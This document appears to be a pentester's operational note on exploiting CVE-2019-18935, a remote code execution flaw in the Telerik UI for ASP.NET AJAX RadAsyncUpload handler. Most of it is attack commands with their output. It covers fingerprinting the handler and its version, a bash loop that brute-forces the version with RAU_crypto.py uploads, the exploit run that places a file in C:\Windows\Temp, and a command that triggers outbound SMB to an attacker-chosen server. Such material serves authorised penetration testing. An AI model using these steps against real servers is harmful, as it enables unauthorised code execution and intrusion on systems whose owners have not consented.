CVE

CVE-2019-18935 - Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization - Remote Code Execution

Installation

git clone https://github.com/noperator/CVE-2019-18935.git

Confirm that the file upload handler is registered

curl -sk <HOST>/Telerik.Web.UI.WebResource.axd?type=rau
{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }

Check version of the software installed

Without authentication

If the application using RadAsyncUpload does not require authentication, then you can usually find the UI version buried somewhere in the HTML source of the application’s home page. The location of the version string isn’t consistent, though, so the best method of locating it is to use Burp to search for the regular expression 20[0-9]{2}(\.[0-9]*)+ (and make sure you check the “Regex” box). You can also accomplish this with cURL:

curl -skL <host> | /usr/bin/grep -oE '20[0-9]{2}(\.[0-9]*)+'

If that doesn’t work, you can alternatively search for the string <script src="/WebResource to identify any JavaScript files that are included in the site’s home page. Choose one of the static resources there and examine its Last-Modified date in the HTTP response header; that date should roughly match the release date of the software. For example, a JavaScript resource bundled with UI for ASP.NET AJAX Q1 2013 (v2013.1.220, released on February 20, 2013) will read Last-Modified: Wed, 20 Feb 2013 00:00:00 GMT in the HTTP response header for that file.

With authentication

If the application does require authentication, then you may be able to determine the software version via brute force. Since uploading a file with RadAsyncUpload requires providing the correct version of Telerik UI, you can use Paul Taylor’s RAU_crypto exploit to submit file upload requests with known-vulnerable versions until you find one that works:

echo 'test' > testfile.txt
for VERSION in 2007.1423 2007.1521 2007.1626 2007.2918 2007.21010 2007.21107 2007.31218 2007.31314 2007.31425 2008.1415 2008.1515 2008.1619 2008.2723 2008.2826 2008.21001 2008.31105 2008.31125 2008.31314 2009.1311 2009.1402 2009.1527 2009.2701 2009.2826 2009.31103 2009.31208 2009.31314 2010.1309 2010.1415 2010.1519 2010.2713 2010.2826 2010.2929 2010.31109 2010.31215 2010.31317 2011.1315 2011.1413 2011.1519 2011.2712 2011.2915 2011.31115 2011.3.1305 2012.1.215 2012.1.411 2012.2.607 2012.2.724 2012.2.912 2012.3.1016 2012.3.1205 2012.3.1308 2013.1.220 2013.1.403 2013.1.417 2013.2.611 2013.2.717 2013.3.1015 2013.3.1114 2013.3.1324 2014.1.225 2014.1.403 2014.2.618 2014.2.724 2014.3.1024 2015.1.204 2015.1.225 2015.2.604 2015.2.623 2015.2.729 2015.2.826 2015.3.930 2015.3.1111 2016.1.113 2016.1.225 2016.2.504 2016.2.607 2016.3.914 2016.3.1018 2016.3.1027 2017.1.118 2017.1.228 2017.2.503 2017.2.621 2017.2.711 2017.3.913; do
    echo -n "$VERSION: "
    python3 RAU_crypto.py -P 'C:\Windows\Temp' "$VERSION" testfile.txt <HOST>/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo
done

When the file upload succeeds, you’ll see a JSON response containing some encrypted data about the uploaded file:

{"fileInfo":{"FileName":"<NAME>","ContentType":"text/html","ContentLength":<LENGTH>,"DateJson":"<DATE>","Index":0}, "metaData":"VGhpcyBpc24ndCByZWFsIGRhdGEsIGJ1dCB0aGUgQmFzZTY0LWVuY29kZWQgZGF0YSBsb29rcyBqdXN0IGxpa2UgdGhpcy4=" }

Examples

Check version

$ curl -skL https://example.com/ | /usr/bin/grep -oE '20[0-9]{2}(\.[0-9]*)+'              
2015.2.623.40
2015.2.623.40
2015.2.623.40
2015.2.623.40

Upload test file

$ python3 CVE-2019-18935.py -p test.txt -t -f 'C:\Windows\Temp' -u https://www.example.com/Telerik.Web.UI.WebResource.axd\?type\=rau -v 2015.2.623
[*] Local payload name:  test.txt
[*] Destination folder:  C:\Windows\Temp
[*] Remote payload name: 1610022896.082644.txt

{'fileInfo': {'ContentLength': 5,
              'ContentType': 'application/octet-stream',
              'DateJson': '1970-01-01T00:00:00.000Z',
              'FileName': '1610022896.082644.txt',
              'Index': 0},
 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
                                     'Telerik.Web.UI, Version=2015.2.623.40, '
                                     'Culture=neutral, '
                                     'PublicKeyToken=121fae78165ba3d4',
              'TempFileName': '1610022896.082644.txt.tmp'}}

[*] Heads up! Payload was renamed on target from "1610022896.082644.txt" to "1610022896.082644.txt.tmp". Will adjust automatically while deserializing; otherwise, if deserializing manually with the "-d" option, use the "-r" option to specify the accurate, renamed payload on target.

Triggering SMB-outbound

python3 CVE-2019-18935.py -u https://<host>/Telerik.Web.UI.WebResource.axd\?type\=rau -v 2015.2.623 -s <ip-of-smb-server> -d

URL list